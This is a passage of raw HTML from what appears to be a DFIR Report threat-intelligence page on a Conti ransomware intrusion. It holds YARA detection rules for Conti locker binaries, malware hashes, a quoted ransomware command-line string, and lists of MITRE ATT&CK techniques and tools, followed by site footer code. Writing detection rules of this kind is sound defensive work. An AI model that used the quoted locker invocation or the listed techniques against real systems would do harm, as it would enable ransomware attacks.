class="hljs-string">"Specifies the password to use."</span> fullword wide <span class="hljs-variable">$s15</span> = <span class="hljs-string">"yyyyvvvvvvvvvxxw"</span> fullword ascii <span class="hljs-variable">$s16</span> = <span class="hljs-string">"yyyyyyrrrsy"</span> fullword ascii <span class="hljs-variable">$s17</span> = <span class="hljs-string">" processorArchitecture=\"x86\""</span> fullword ascii <span class="hljs-variable">$s18</span> = <span class="hljs-string">" processorArchitecture=\"x86\""</span> fullword ascii <span class="hljs-variable">$s19</span> = <span class="hljs-string">"Prevents Setup from restarting the system following a successful installation, or after a Preparing to Install failure that requ"</span> wide <span class="hljs-variable">$s20</span> = <span class="hljs-string">"/DIR=\"x:\\dirname\""</span> fullword wide condition: uint16(<span class="hljs-number">0</span>) == <span class="hljs-number">0x5a4d</span> <span class="hljs-keyword">and</span> filesize < <span class="hljs-number">7000</span>KB <span class="hljs-keyword">and</span> <span class="hljs-number">8</span> of them } rule mal_host2_locker { meta: description = <span class="hljs-string">"mal - file locker.bat"</span> author = <span class="hljs-string">"TheDFIRReport"</span> date = <span class="hljs-string">"2021-<span class="hljs-comment">11-29</span>"</span> hash1 = <span class="hljs-string">"1edfae602f195d53b63707fe117e9c47e1925722533be43909a5d594e1ef63d3"</span> strings: <span class="hljs-variable">$x1</span> = <span class="hljs-string">"_locker.exe -m -net -size 10 -nomutex -p"</span> ascii condition: uint16(<span class="hljs-number">0</span>) == <span class="hljs-number">0x7473</span> <span class="hljs-keyword">and</span> filesize < <span class="hljs-number">8</span>KB <span class="hljs-keyword">and</span> <span class="hljs-variable">$x1</span> } import "pe" rule o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker { meta: description = "conti - file 
o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker.exe" author = "The DFIR Report" reference = "https://thedfirreport.com" date = "2021-11-29" hash1 = "9cd3c0cff6f3ecb31c7d6bc531395ccfd374bcd257c3c463ac528703ae2b0219" strings: $s1 = "AppPolicyGetProcessTerminationMethod" fullword ascii $s2 = "operator co_await" fullword ascii $s3 = ">*>6>A>_>" fullword ascii /* hex encoded string 'j' */ $s4 = "api-ms-win-appmodel-runtime-l1-1-2" fullword wide $s5 = "Bapi-ms-win-core-fibers-l1-1-1" fullword wide $s6 = "SVWjEhQ" fullword ascii $s7 = ";F;[;l;" fullword ascii /* Goodware String - occured 1 times */ $s8 = "74787@7H7P7T7\\7p7" fullword ascii /* Goodware String - occured 1 times */ $s9 = "6#606B6" fullword ascii /* Goodware String - occured 1 times */ $s10 = "<!=X=u=" fullword ascii /* Goodware String - occured 1 times */ $s11 = "expand 32-byte k" fullword ascii /* Goodware String - occured 1 times */ $s12 = "6!7?7J7" fullword ascii /* Goodware String - occured 2 times */ $s13 = "delete" fullword ascii /* Goodware String - occured 2789 times */ $s14 = "4!4(4/464=4D4K4R4Z4b4j4v4" fullword ascii /* Goodware String - occured 3 times */ $s15 = ".CRT$XIAC" fullword ascii /* Goodware String - occured 3 times */ $s16 = "0#0)01060\\0a0" fullword ascii $s17 = ";\";/;=;K;V;l;" fullword ascii $s18 = "6,606P6X6\\6x6" fullword ascii $s19 = "6(6,6@6D6H6L6P6T6X6\\6`6d6p6t6x6|6" fullword ascii $s20 = "8 :M:}:" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 600KB and ( pe.imphash() == "50472e0ba953856d228c7483b149ea72" or all of them ) } rule o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x86 { meta: description = "conti - file o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x86.dll" author = "The DFIR Report" reference = "https://thedfirreport.com" date = "2021-11-29" hash1 = "01a9549c015cfcbff4a830cea7df6386dc5474fd433f15a6944b834551a2b4c9" strings: $s1 = "conti_v3.dll" fullword ascii $s2 = 
"AppPolicyGetProcessTerminationMethod" fullword ascii $s3 = "6 7/787E7[7" fullword ascii /* hex encoded string 'gx~w' */ $s4 = "operator co_await" fullword ascii $s5 = "2%3.3f3~3" fullword ascii /* hex encoded string '#?3' */ $s6 = "1\"1&1,:4:<:D:L:T:\\:d:l:t:|:" fullword ascii $s7 = "api-ms-win-appmodel-runtime-l1-1-2" fullword wide $s8 = "SVWjEhQ" fullword ascii $s9 = "__swift_2" fullword ascii $s10 = "__swift_1" fullword ascii $s11 = "api-ms-win-core-file-l1-2-2" fullword wide /* Goodware String - occured 1 times */ $s12 = "7K7P7T7X7\\7" fullword ascii /* Goodware String - occured 1 times */ $s13 = "7h7o7v7}7" fullword ascii /* Goodware String - occured 1 times */ $s14 = "O0a0s0" fullword ascii /* Goodware String - occured 1 times */ $s15 = ";?;I;S;" fullword ascii /* Goodware String - occured 1 times */ $s16 = "8>8C8Q8V8" fullword ascii /* Goodware String - occured 1 times */ $s17 = "QQSVj8j@" fullword ascii $s18 = "5-5X5s5" fullword ascii /* Goodware String - occured 1 times */ $s19 = "expand 32-byte k" fullword ascii /* Goodware String - occured 1 times */ $s20 = "delete" fullword ascii /* Goodware String - occured 2789 times */ condition: uint16(0) == 0x5a4d and filesize < 600KB and ( pe.imphash() == "749dc5143e9fc01aa1d221fb9a48d5ea" or all of them ) } rule o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x64 { meta: description = "conti - file o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x64.dll" author = "The DFIR Report" reference = "https://thedfirreport.com" date = "2021-11-29" hash1 = "31656dcea4da01879e80dff59a1af60ca09c951fe5fc7e291be611c4eadd932a" strings: $s1 = "conti_v3.dll" fullword ascii $s2 = "AppPolicyGetProcessTerminationMethod" fullword ascii $s3 = "operator co_await" fullword ascii $s4 = "api-ms-win-appmodel-runtime-l1-1-2" fullword wide $s5 = "api-ms-win-core-file-l1-2-2" fullword wide /* Goodware String - occured 1 times */ $s6 = "__swift_2" fullword ascii $s7 = "__swift_1" fullword ascii 
$s8 = "expand 32-byte k" fullword ascii /* Goodware String - occured 1 times */ $s9 = "u3HcH<H" fullword ascii /* Goodware String - occured 2 times */ $s10 = "D$XD9x" fullword ascii /* Goodware String - occured 2 times */ $s11 = "delete" fullword ascii /* Goodware String - occured 2789 times */ $s12 = "ue!T$(H!T$ " fullword ascii $s13 = "L$&8\\$&t,8Y" fullword ascii $s14 = "F 2-by" fullword ascii $s15 = "u\"8Z(t" fullword ascii $s16 = "L$ |+L;" fullword ascii $s17 = "vB8_(t" fullword ascii $s18 = "ext-ms-" fullword wide $s19 = "OOxq*H" fullword ascii $s20 = "H97u+A" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 600KB and ( pe.imphash() == "137fa89046164fe07e0dd776ed7a0191" or all of them ) } </code></pre> <h3 id="mitre">MITRE</h3> <pre><code>T1218<span class="hljs-number">.010</span> - Signed Binary Proxy Execution: Regsvr32 T1218<span class="hljs-number">.005</span> - Signed Binary Proxy Execution: Mshta T1218<span class="hljs-number">.011</span> - Signed Binary Proxy Execution: Rundll32 T1567<span class="hljs-number">.002</span> - Exfiltration Over Web Service: Exfiltration to Cloud Storage T1105 - Ingress Tool Transfer T1059<span class="hljs-number">.005</span> - Command and Scripting Interpreter: Visual Basic T1059<span class="hljs-number">.007</span> - Command and Scripting Interpreter: JavaScript T1059<span class="hljs-number">.001</span> - Command and Scripting Interpreter: PowerShell T1055 - Process Injection T1486 - Data Encrypted <span class="hljs-keyword">for</span> Impact T1482 - Domain Trust Discovery T1047 - Windows Management Instrumentation T1021<span class="hljs-number">.002</span> - Remote Services: SMB/Windows Admin Shares T1124 - System Time Discovery T1021<span class="hljs-number">.001</span> - Remote Services: Remote Desktop Protocol T1566<span class="hljs-number">.001</span> - Phishing: Spearphishing Attachment T1087<span class="hljs-number">.002</span> - Account Discovery: Domain Account T1087<span 
class="hljs-number">.001</span> - Account Discovery: Local Account T1057 - Process Discovery T1083 - File and Directory Discovery T1590<span class="hljs-number">.005</span> - Gather Victim Network Information: IP Addresses </code></pre> <h3 id="mitre-software">MITRE Software</h3> <pre><code><span class="hljs-title">Net</span> – S0039 Nltest – S0359 Cmd – S0106 Tasklist – S0057 Cobalt Strike – S0154 AdFind – S0552 </code></pre> <h3 id="references">References</h3> <ul> <li>Detecting Rclone – An Effective Tool for Exfiltration, NCC Group – <a href="https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/" target="_blank" rel="noopener">https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/</a></li> <li>Rundll32, Red Canary – <a href="https://redcanary.com/threat-detection-report/techniques/rundll32/" target="_blank" rel="noopener">https://redcanary.com/threat-detection-report/techniques/rundll32/</a></li> <li>TA551 (Shathak) continues pushing BazarLoader, infections lead to Cobalt Strike, SANS ISC – <a href="https://isc.sans.edu/forums/diary/TA551+Shathak+continues+pushing+BazarLoader+infections+lead+to+Cobalt+Strike/27738/" target="_blank" rel="noopener">https://isc.sans.edu/forums/diary/TA551+Shathak+continues+pushing+BazarLoader+infections+lead+to+Cobalt+Strike/27738/</a></li> <li>Invoke-ShareFinder, GitHub [Veil PowerView] – <a href="https://github.com/darkoperator/Veil-PowerView/blob/master/PowerView/functions/Invoke-ShareFinder.ps1" target="_blank" rel="noopener">https://github.com/darkoperator/Veil-PowerView/blob/master/PowerView/functions/Invoke-ShareFinder.ps1</a></li> <li>taskmgr.exe slashing numbers, Hexacorn – <a href="https://www.hexacorn.com/blog/2018/07/22/taskmgr-exe-slashing-numbers/" target="_blank" rel="noopener">https://www.hexacorn.com/blog/2018/07/22/taskmgr-exe-slashing-numbers/</a></li> </ul> <p>Internal case #5794</p> </div> <div class="sharedaddy 
.components-text-control__input,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form .wp-block-jetpack-subscriptions__textfield input[type=email],.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form p#subscribe-email .components-base-control__field,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form p#subscribe-email .components-text-control__input,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form p#subscribe-email input[type=email],.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form .wp-block-jetpack-subscriptions__textfield .components-base-control__field,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form .wp-block-jetpack-subscriptions__textfield .components-text-control__input,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form .wp-block-jetpack-subscriptions__textfield input[type=email],.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form p#subscribe-email .components-base-control__field,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form p#subscribe-email .components-text-control__input,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form p#subscribe-email input[type=email]{height:auto;margin:0;width:100%}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form p#subscribe-email,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form p#subscribe-submit,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form 
p#subscribe-email,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form p#subscribe-submit{line-height:0;margin:0;padding:0}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline.wp-block-jetpack-subscriptions__show-subs .wp-block-jetpack-subscriptions__subscount{font-size:16px;margin:8px 0;text-align:end}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline.wp-block-jetpack-subscriptions__use-newline .wp-block-jetpack-subscriptions__form-elements{display:block}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline.wp-block-jetpack-subscriptions__use-newline .wp-block-jetpack-subscriptions__button,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline.wp-block-jetpack-subscriptions__use-newline button{display:inline-block;max-width:100%}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline.wp-block-jetpack-subscriptions__use-newline .wp-block-jetpack-subscriptions__subscount{text-align:start}#subscribe-submit.is-link{text-align:center;width:auto!important}#subscribe-submit.is-link a{margin-left:0!important;margin-top:0!important;width:auto!important}@keyframes jetpack-memberships_button__spinner-animation{to{transform:rotate(1turn)}}.jetpack-memberships-spinner{display:none;height:1em;margin:0 0 0 5px;width:1em}.jetpack-memberships-spinner svg{height:100%;margin-bottom:-2px;width:100%}.jetpack-memberships-spinner-rotating{animation:jetpack-memberships_button__spinner-animation .75s linear infinite;transform-origin:center}.is-loading .jetpack-memberships-spinner{display:inline-block}body.jetpack-memberships-modal-open{overflow:hidden}dialog.jetpack-memberships-modal{opacity:1}dialog.jetpack-memberships-modal,dialog.jetpack-memberships-modal 
iframe{background:#0000;border:0;bottom:0;box-shadow:none;height:100%;left:0;margin:0;padding:0;position:fixed;right:0;top:0;width:100%}dialog.jetpack-memberships-modal::backdrop{background-color:#000;opacity:.7;transition:opacity .2s ease-out}dialog.jetpack-memberships-modal.is-loading,dialog.jetpack-memberships-modal.is-loading::backdrop{opacity:0} </style> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/js/navigation.min.js?ver=6.7.1" id="freenews-navigation-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/js/skip-link-focus-fix.js?ver=6.7.1" id="freenews-skip-link-focus-fix-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/sticky-sidebar/ResizeSensor.min.js?ver=6.7.1" id="ResizeSensor-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/sticky-sidebar/theia-sticky-sidebar.min.js?ver=6.7.1" id="theia-sticky-sidebar-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/slick/slick.min.js?ver=6.7.1" id="slick-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/slick/slick-settings.js?ver=6.7.1" id="freenews-slick-settings-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/sticky/jquery.sticky.js?ver=6.7.1" id="jquery-sticky-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/sticky/sticky-setting.js?ver=6.7.1" id="freenews-sticky-settings-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/marquee/jquery.marquee.min.js?ver=6.7.1" id="marquee-js"></script> <script type="text/javascript" 
src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/marquee/marquee-settings.js?ver=6.7.1" id="freenews-marquee-settings-js"></script> <script type="text/javascript" src="https://stats.wp.com/e-202448.js" id="jetpack-stats-js" data-wp-strategy="defer"></script> <script type="text/javascript" id="jetpack-stats-js-after"> /* <![CDATA[ */ _stq = window._stq || []; _stq.push([ "view", JSON.parse("{\"v\":\"ext\",\"blog\":\"175340963\",\"post\":\"4690\",\"tz\":\"0\",\"srv\":\"thedfirreport.com\",\"j\":\"1:14.0\"}") ]); _stq.push([ "clickTrackerInit", "175340963", "4690" ]); /* ]]> */ </script> <script type="text/javascript" id="google-translate-init-js-extra"> /* <![CDATA[ */ var _wp_google_translate_widget = {"lang":"en_US","layout":"0"}; /* ]]> */ </script> <script type="text/javascript" src="https://c0.wp.com/p/jetpack/14.0/_inc/build/widgets/google-translate/google-translate.min.js" id="google-translate-init-js"></script> <script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit&ver=14.0" id="google-translate-js"></script> <script type="text/javascript" id="jetpack-blocks-assets-base-url-js-before"> /* <![CDATA[ */ var Jetpack_Block_Assets_Base_Url="https://thedfirreport.com/wp-content/plugins/jetpack/_inc/blocks/"; /* ]]> */ </script> <script type="text/javascript" src="https://c0.wp.com/c/6.7.1/wp-includes/js/dist/dom-ready.min.js" id="wp-dom-ready-js"></script> <script type="text/javascript" src="https://c0.wp.com/c/6.7.1/wp-includes/js/dist/vendor/wp-polyfill.min.js" id="wp-polyfill-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/plugins/jetpack/_inc/blocks/subscriptions/view.js?minify=false&ver=14.0" id="jetpack-block-subscriptions-js"></script> <script type="text/javascript" id="sharing-js-js-extra"> /* <![CDATA[ */ var sharing_js_options = {"lang":"en","counts":"1","is_stats_active":"1"}; /* ]]> */ </script> <script type="text/javascript" 
src="https://c0.wp.com/p/jetpack/14.0/_inc/build/sharedaddy/sharing.min.js" id="sharing-js-js"></script> <script type="text/javascript" id="sharing-js-js-after"> /* <![CDATA[ */ var windowOpen; ( function () { function matches( el, sel ) { return !! ( el.matches && el.matches( sel ) || el.msMatchesSelector && el.msMatchesSelector( sel ) ); } document.body.addEventListener( 'click', function ( event ) { if ( ! event.target ) { return; } var el; if ( matches( event.target, 'a.share-twitter' ) ) { el = event.target; } else if ( event.target.parentNode && matches( event.target.parentNode, 'a.share-twitter' ) ) { el = event.target.parentNode; } if ( el ) { event.preventDefault(); // If there's another sharing window open, close it. if ( typeof windowOpen !== 'undefined' ) { windowOpen.close(); } windowOpen = window.open( el.getAttribute( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' ); return false; } } ); } )(); var windowOpen; ( function () { function matches( el, sel ) { return !! ( el.matches && el.matches( sel ) || el.msMatchesSelector && el.msMatchesSelector( sel ) ); } document.body.addEventListener( 'click', function ( event ) { if ( ! event.target ) { return; } var el; if ( matches( event.target, 'a.share-linkedin' ) ) { el = event.target; } else if ( event.target.parentNode && matches( event.target.parentNode, 'a.share-linkedin' ) ) { el = event.target.parentNode; } if ( el ) { event.preventDefault(); // If there's another sharing window open, close it. if ( typeof windowOpen !== 'undefined' ) { windowOpen.close(); } windowOpen = window.open( el.getAttribute( 'href' ), 'wpcomlinkedin', 'menubar=1,resizable=1,width=580,height=450' ); return false; } } ); } )(); var windowOpen; ( function () { function matches( el, sel ) { return !! ( el.matches && el.matches( sel ) || el.msMatchesSelector && el.msMatchesSelector( sel ) ); } document.body.addEventListener( 'click', function ( event ) { if ( ! 
</body>
</html>